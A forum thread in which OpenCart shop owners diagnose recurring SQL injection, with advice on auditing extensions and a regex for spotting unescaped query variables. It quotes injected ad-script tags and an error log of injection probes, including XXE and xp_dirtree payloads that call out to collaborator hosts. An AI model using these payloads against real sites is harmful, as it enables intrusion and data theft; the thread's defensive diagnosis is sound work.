Post by rhysjuk » Sun Apr 16, 2017 9:15 pm

I have a client running OC 2.3.0.2 and there seems to be an SQL injection occurring on a daily basis. The Product & Category description seems to include the following code:

```html
<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script
```
I have regular backups of mysql and OC files at hand, so every time there's an injection I'm restoring both mysql and OC files to be on the safe side.
I'm pulling my hair out on this one, I've tried many security recommendations and followed the standard Opencart Security amendments but unfortunately the site is still being attacked.

Any advice is greatly appreciated :)

Thanks
Rhys


Post by HAO » Sun Apr 16, 2017 11:24 pm

I hope OpenCart official can face this problem.

Because today I received two customer responses saying they were successfully scammed by a fraud group.

This is already a clear money loss from fraud: the fraud group invades our system and uses the correct customer order data for fraud.

I hope you will be able to provide fixes in the same correction mode as Joomla!, so we can keep the most complete protection, and not have to find bugs one by one to fix.

This may result in information security vulnerabilities for those of us who are from non-English-speaking countries, because we do not even know how to fix them.

Please fix this problem and provide updated patch files for us to download.

Like this:
https://downloads.joomla.org/cms/joomla3/3-6-5 Joomla! 3.6.x to 3.6.5 Patch Package (.zip)


Post by ADD Creative » Mon Apr 17, 2017 6:10 am

If you haven't already, change your passwords for all admin users.

Check that the files on your server have not been modified by comparing them against a clean download.

Look through your web server logs for anything suspicious.

www.add-creative.co.uk


Post by rhysjuk » Mon Apr 17, 2017 6:45 pm

ADD Creative wrote:
Mon Apr 17, 2017 6:10 am
If you haven't already, change your passwords for all admin users.

Check that the files on your server have not been modified by comparing them against a clean download.

Look through your web server logs for anything suspicious.
Good advice. I replaced the files so quickly to get the website functioning correctly that I didn't analyse which site files were modified. I know for certain the product and category descriptions were modified because that's the only part I did analyse.
I've been investigating further and noticed this exploit; I'm wondering if it's the same but I'm not sure how to overcome it.

https://www.exploit-db.com/exploits/39679/

Thanks again
Rhys


Post by IP_CAM » Tue Apr 18, 2017 9:39 am

Did you really kill/delete/remove each entire Subdirectory, then upload the
entire clean Subdirectory again, only containing what should be there by default?
Or did you just overwrite the existing Subdirectory Content, without checking first
if possibly additional files exist? But this would not be sufficient to make sure.
Just an idea...
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.



Post by ADD Creative » Tue Apr 18, 2017 8:59 pm

rhysjuk wrote:
Mon Apr 17, 2017 6:45 pm
ADD Creative wrote:
Mon Apr 17, 2017 6:10 am
If you haven't already, change your passwords for all admin users.

Check that the files on your server have not been modified by comparing them against a clean download.

Look through your web server logs for anything suspicious.
Good advice. I replaced the files so quickly to get the website functioning correctly that I didn't analyse which site files were modified. I know for certain the product and category descriptions were modified because that's the only part I did analyse.
I've been investigating further and noticed this exploit; I'm wondering if it's the same but I'm not sure how to overcome it.

https://www.exploit-db.com/exploits/39679/

Thanks again
Rhys
That exploit only works if you do not have JSON installed on your server. So make sure JSON is installed. Do you currently have JSON support enabled? Check with phpinfo.

www.add-creative.co.uk



Post by HAO » Tue Apr 18, 2017 10:52 pm

IP_CAM wrote:
Tue Apr 18, 2017 9:39 am
Did you really kill/delete/remove each entire Subdirectory, then upload the
entire clean Subdirectory again, only containing what should be there by default?
Or did you just overwrite the existing Subdirectory Content, without checking first
if possibly additional files exist? But this would not be sufficient to make sure.
Just an idea...
Ernie
I have used Beyond Compare 2 to compare files. The original files have no obvious changes.

Most of the file changes are ones made by themes or extensions; the comparison of all the files is not finished yet.

But my focus is this: for those of us with poor English ability, I hope to be able to fix things directly.

Like phpBB or Joomla!, with the same way of updating: we just upload and replace the Patch Package, and it can achieve a certain degree of security.

Even if there are conflicts in the middle, we should be able to compare them; there is even a manual update guide that allows us to follow the steps to modify it, so that does not matter.

But in the current situation, I do not know where to start.


Post by ADD Creative » Wed Apr 19, 2017 2:05 am

What version of OpenCart are you currently using?

www.add-creative.co.uk



Post by HAO » Wed Apr 19, 2017 12:09 pm

I am currently using OpenCart 2.1.0.2; I plan to upgrade to OpenCart 2.3.0.2.

But no matter which version, at present there is only a formal release of each version, and in between the bugs need to be fixed by ourselves.

I would like to ask: is my understanding correct?

If so, I believe codechanges and patches are a must, because not everyone has strong English skills, and it is difficult to fix each bug.

Codechanges and patches can do this.

This is what I want to say.


Post by rhysjuk » Wed Apr 19, 2017 2:21 pm

IP_CAM wrote:
Tue Apr 18, 2017 9:39 am
Did you really kill/delete/remove each entire Subdirectory, then upload the
entire clean Subdirectory again, only containing what should be there by default?
Or did you just overwrite the existing Subdirectory Content, without checking first
if possibly additional files exist? But this would not be sufficient to make sure.
Just an idea...
Ernie
I backed up orders, products, categories, options, reviews, customers & addresses, then wiped all the files off FTP and copied over a fresh installation. I stripped all the dodgy code, then restored to a fresh database. Once I knew everything was clean and correct, I made a complete snapshot of the database and site files. As the SQL injection happened on a daily basis, I was reverting to the snapshot and then carrying out differential restores. This got the site up and running within 20 minutes instead of 4 hours.
I have made some additional security changes and am just waiting to see what happens - this is the longest time it's been since my client's site was breached.
Hopefully the additional security script has worked; I will share it when I know it works.

Thanks everyone, appreciate the support


Post by rhysjuk » Wed Apr 19, 2017 2:29 pm

ADD Creative wrote:
Tue Apr 18, 2017 8:59 pm
rhysjuk wrote:
Mon Apr 17, 2017 6:45 pm
ADD Creative wrote:
Mon Apr 17, 2017 6:10 am
If you haven't already, change your passwords for all admin users.

Check that the files on your server have not been modified by comparing them against a clean download.

Look through your web server logs for anything suspicious.
Good advice. I replaced the files so quickly to get the website functioning correctly that I didn't analyse which site files were modified. I know for certain the product and category descriptions were modified because that's the only part I did analyse.
I've been investigating further and noticed this exploit; I'm wondering if it's the same but I'm not sure how to overcome it.

https://www.exploit-db.com/exploits/39679/

Thanks again
Rhys
That exploit only works if you do not have JSON installed on your server. So make sure JSON is installed. Do you currently have JSON support enabled? Check with phpinfo.
Good question. I checked and JSON support is enabled, v1.2.1.
So this makes me wonder whether this is a new SQL injection and I've been unlucky to have a client who's been attacked.


Post by ADD Creative » Wed Apr 19, 2017 7:26 pm

HAO wrote:
Wed Apr 19, 2017 12:09 pm
I am currently using OpenCart 2.1.0.2; I plan to upgrade to OpenCart 2.3.0.2.

But no matter which version, at present there is only a formal release of each version, and in between the bugs need to be fixed by ourselves.

I would like to ask: is my understanding correct?

If so, I believe codechanges and patches are a must, because not everyone has strong English skills, and it is difficult to fix each bug.

Codechanges and patches can do this.

This is what I want to say.
Sadly, you are correct. There are no easy-to-apply patches for older versions. You are expected to upgrade to the latest version. This can be difficult as any themes, extensions and modifications need updating too.

Upgrading to 2.3.0.2 is also harder as the directory structure for extensions was changed.

I would recommend that you make a copy of your site and database at a new location and work out what needs to be done and fixed before upgrading your actual site.

www.add-creative.co.uk



Post by HAO » Wed Apr 19, 2017 8:12 pm

My idea is that when a version is released, it is usually in a chaotic state.

On the current official release of 2.3.0.2, there are already a lot of people reporting bugs and fixes.

So what counts as the 2.3.0.2 version? Is there no need to patch?

If 2.3.0.2 still counts as having bugs, codechanges and patches are still needed.

In any case there is no such thing; I have a lot of experience of many modules not supporting 2.3.0.2 (from GitHub 2.3.0.3 RC),

because the architecture of the installation module is different.

As for the new version of the environment, I may have to spend more time dealing with it.


Post by HAO » Wed Apr 19, 2017 10:55 pm

I found something like this for OpenCart 2.1.0.2.

https://randemsystems.com/support/openc ... 9/#msg6199

I am trying to upload the modified file, but it seems to have an impact on my style.

Do I have to fix the above manually, as I do with other fixes?


Post by HAO » Fri Apr 21, 2017 6:00 pm

I have just confirmed that I was also attacked by SQL injection.

The cause of the attack is a loophole in a module; the hacker seems to be using the module to steal data.

```
2017-04-10 19:22:56 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&lt;x5s75'' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639}}r5q2m'/&quot;&lt;x5s75' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:56 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:56 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:56 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&lt;ha5y9'' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639%}na043'/&quot;&lt;ha5y9' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:56 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:56 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:57 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&lt;khv03'' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639tjkob%&gt;es6w6'/&quot;&lt;khv03' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:57 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:57 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:57 - PHP Notice:  Error: FUNCTION tyleetw_shop.xmltype does not exist<br />Error No: 1305<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639'||(select extractvalue(xmltype('&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % mvrln SYSTEM &quot;http://8hqser7xxp5qdnz81ir8ibq35ubkzonga7yw.burpcollab'||'orator.net/&quot;&gt;%mvrln;]&gt;'),'/l') from dual)||'' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:57 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:57 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:58 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\n1p7y6rch4p5x2jnlxbn2qaip9vzjq9e11sph.burpcollab'+'orator.net\cvc'; exec maste' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639;declare @q varchar(99);set @q='\\n1p7y6rch4p5x2jnlxbn2qaip9vzjq9e11sph.burpcollab'+'orator.net\cvc'; exec master.dbo.xp_dirtree @q;-- ' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:58 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:58 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:58 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'declare @q varchar(99);set @q='\\x97h6gzmpexf5crxt7jxa0isxj39r0ioab1zq.burpcolla' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639';declare @q varchar(99);set @q='\\x97h6gzmpexf5crxt7jxa0isxj39r0ioab1zq.burpcollab'+'orator.net\mck'; exec master.dbo.xp_dirtree @q;-- ' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:58 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:58 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:58 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\nof7l6ec44c5k26n8xynpqxic9iz6qyeq1hp6.burpcollab'+'orator.net\lrd'; exec maste' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639);declare @q varchar(99);set @q='\\nof7l6ec44c5k26n8xynpqxic9iz6qyeq1hp6.burpcollab'+'orator.net\lrd'; exec master.dbo.xp_dirtree @q;-- ' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:58 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:58 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:59 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ');declare @q varchar(99);set @q='\\qoial9ef47c8k56q80yqptxlcci26tzhr4is7.burpcol' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639');declare @q varchar(99);set @q='\\qoial9ef47c8k56q80yqptxlcci26tzhr4is7.burpcollab'+'orator.net\zrz'; exec master.dbo.xp_dirtree @q;-- ' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:59 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:59 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:59 - PHP Notice:  Undefined index: quantity in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:59 - PHP Notice:  Undefined index: stock_status_id in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:23:00 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''4639''' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639'' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:23:00 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:23:00 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
```


Post by ADD Creative » Fri Apr 21, 2017 8:40 pm

Definitely looks like you have some vulnerable extensions.

The line below is definitely from an extension.
```
SELECT quantity,stock_status_id from oc_product where product_id = '4639}}r5q2m'/&quot;&lt;x5s75'
```
It's clear from this that product_id is not being cast to an int to prevent injection.

I've seen a couple of sites compromised due to vulnerable extensions.

It's best if you go through all the SQL queries in all extensions to check that all variables used are escaped in some way.

I use the following regular expression search in a text editor to help with this. But it's not perfect.
```
=[\s]*'"[^\w]*(?<!\(int\))\$(?!(this->db->escape|db->escape))[\w]+
```

www.add-creative.co.uk


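Added example (Python, not code from the forum or from OpenCart): it runs the regular expression from ADD Creative's post above over a few constructed OpenCart-style query lines, and mimics PHP's (int) cast to show what happens to one of the product_id values from the log when the cast is in place. The sample query lines and the helper names are hypothetical.

```python
import re

# The regular expression from the post above, used unchanged: it flags a PHP
# variable concatenated into a quoted SQL value that is neither cast with (int)
# nor wrapped in $this->db->escape(). As the post says, it is a heuristic.
UNESCAPED_SQL_VAR = re.compile(
    r"""=[\s]*'"[^\w]*(?<!\(int\))\$(?!(this->db->escape|db->escape))[\w]+"""
)

# Constructed sample of OpenCart-style query lines (hypothetical, not taken from
# any real extension). Lines 1 and 4 are the unsafe ones; lines 2 and 3 show the
# (int) cast and db->escape() forms the regex is designed to ignore.
SAMPLE_PHP = r'''
$query = $this->db->query("SELECT quantity, stock_status_id FROM " . DB_PREFIX . "product WHERE product_id = '" . $product_id . "'");
$query = $this->db->query("SELECT quantity, stock_status_id FROM " . DB_PREFIX . "product WHERE product_id = '" . (int)$product_id . "'");
$query = $this->db->query("SELECT * FROM " . DB_PREFIX . "product_description WHERE name = '" . $this->db->escape($name) . "'");
$query = $this->db->query("SELECT * FROM " . DB_PREFIX . "review WHERE author = '" . $data['author'] . "'");
'''.strip("\n")


def find_unescaped_sql_vars(php_source: str) -> list:
    """Return (line_number, variable_name) for every line the regex flags."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        match = UNESCAPED_SQL_VAR.search(line)
        if match:
            # The match ends with "$name"; keep only the variable name.
            hits.append((lineno, match.group(0).rsplit("$", 1)[1]))
    return hits


def php_int_cast(value: str) -> int:
    """Mimic PHP's (int) cast on a string: leading whitespace, an optional sign
    and the leading digits are kept, everything from the first non-digit on is
    dropped, and a string with no leading number becomes 0."""
    match = re.match(r"\s*([+-]?\d+)", value)
    return int(match.group(1)) if match else 0


if __name__ == "__main__":
    for lineno, name in find_unescaped_sql_vars(SAMPLE_PHP):
        print(f"line {lineno}: ${name} reaches the query without (int) or db->escape()")
    # One of the product_id values from the error log above: with the cast in
    # place only the leading 4639 survives, so the rest never reaches MySQL.
    print(php_int_cast("4639}}r5q2m'/\"<x5s75"))
```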

Post by HAO » Fri Apr 21, 2017 9:42 pm

I have asked the developer to handle it.

In fact, when I bought the extension, we encountered the same problem; it looks like he did not fix it.

Because he said that I might be wrong, but the same problem has kept happening. So if we disable this extension, is 2.1.0.2 safe?


Post by sims » Fri Apr 21, 2017 11:52 pm

Can I ask which extension is vulnerable?

I have had exactly the same thing happen - advert code added to the description in 2 tables - but I am running Opencart 1.5.5.1.

They did not gain login access and no files were altered in any way.
Last edited by sims on Sat Apr 22, 2017 5:47 pm, edited 1 time in total.


Post by rhysjuk » Sat Apr 22, 2017 2:14 am

Gentlemen, this is what I used and it's prevented the SQL injection so far, hope it works for you also.

viewtopic.php?t=115388

Thanks
Rhys
